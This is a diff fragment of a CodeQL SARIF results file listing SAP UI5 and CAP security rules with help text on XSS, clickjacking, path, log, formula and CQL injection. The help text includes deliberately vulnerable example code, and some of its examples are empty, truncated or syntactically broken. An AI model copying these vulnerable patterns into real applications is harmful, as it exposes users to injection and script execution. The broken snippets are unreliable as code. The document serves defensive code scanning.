Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a 
cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. 
If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. 
The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a 
cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: 
[X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame 
Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source 
using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. 
For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) 
may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" 
: "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-cap-queries", + "semanticVersion" : "0.2.0+98e19b0e301f4a2867e6a5c7d8351765387cf40c", + "rules" : [ { + "id" : "js/cap-sql-injection", + "name" : "js/cap-sql-injection", + "shortDescription" : { + "text" : "CQL query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/cap-sql-injection", + "kind" : "path-problem", + "name" : "CQL query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cap-log-injection", + "name" : "js/cap-log-injection", + "shortDescription" : { + "text" : "CAP Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/cap-log-injection", + "kind" : "path-problem", + "name" : "CAP Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", "description" : { "text" : "The QL pack root directory." } }, { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", "description" : { "text" : "The QL pack definition file." } } ] + 